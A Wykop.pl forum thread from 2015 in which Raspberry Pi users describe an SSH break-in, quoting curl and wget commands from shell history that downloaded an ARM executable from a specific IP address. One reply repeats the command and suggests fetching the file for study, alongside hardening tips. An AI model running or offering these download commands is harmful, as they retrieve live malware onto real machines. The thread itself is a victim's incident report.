Wykop.pl Wykop.pl
  • Główna
  • Wykopalisko425
  • Mikroblog
  • Zaloguj się
  • Zarejestruj się
  • Wykop.pl
  • Ciekawostki

    Ciekawostki
  • Informacje

    Informacje
  • Rozrywka

    Rozrywka
  • Sport

    Sport
  • Motoryzacja

    Motoryzacja
  • Technologia

    Technologia
  • Ukraina

    Ukraina
  • Gospodarka

    Gospodarka
  • Podróże

    Podróże

Dostosuj Wykop do siebie

Wybierz treści, które Cię interesują
i zapisz jako Własną kategorię.

dvz2010
Profil firmowy

dvz2010

Dołączył 7 lat i 11 mies. temu
  • Obserwuj
  • Akcje 2
  • Znaleziska 0
  • Mikroblog 2
  • Obserwujący 0
  • Obserwowane 1
v.....s
konto usunięte 09.08.2015, 12:25:53
  • 5
#raspberrypi kurde, dziś troche zostałem zaskoczony. Z jednej strony głupota i lenistwo, a z drugiej nie spodziewałem się, że takie coś może się stać.Łączę się przez ssh i z racji tego, że nie dodałem jeszcze kilku procesów do uruchamiania przy boot'owaniu to history i szukam co tam było ostatnio odpalane co by nie musieć za dużo wpisywać. Jakie było moje zdziwienie gdy nagle zobaczyłem:

675 curl -O http://104.238.147.236/arm
676 wget http://104.238.147.236/arm
677
  • RicoElectrico
  • ntskj
  • czynmydobro
  • r0101
  • Cronox
  • 5
dvz2010
dvz2010 18.08.2015, 07:33:25
  • 0
I have the same problem, and I found a file ARM in the./tmp. This is an executable file (129 860 bytes), and not just a script. You can study to get it in the current directory with the same command wget http://104.238.147.236/arm. Viewing logs in /var/logs/auth.log showed an attack on the port SSH.
Change the port (default 22) in the ./etc/ssh/sshd_config on your own value.
Change password for user PI.
The attacks
dvz2010
dvz2010 19.08.2015, 06:47:06
  • 0
after attack I found installed EXIM4 and ANACRON

Osiągnięcia

  • Rocznica
    od 18.08.2022

    Rocznica

Wykop © 2005-2023

  • Nowy Wykop
  • O nas
  • Reklama
  • FAQ
  • Kontakt
  • Regulamin
  • Polityka prywatności i cookies
  • Hity
  • Ranking
  • Osiągnięcia
  • więcej

RSS

  • Wykopane
  • Wykopalisko
  • Komentowane
  • Ustawienia prywatności

Wykop.pl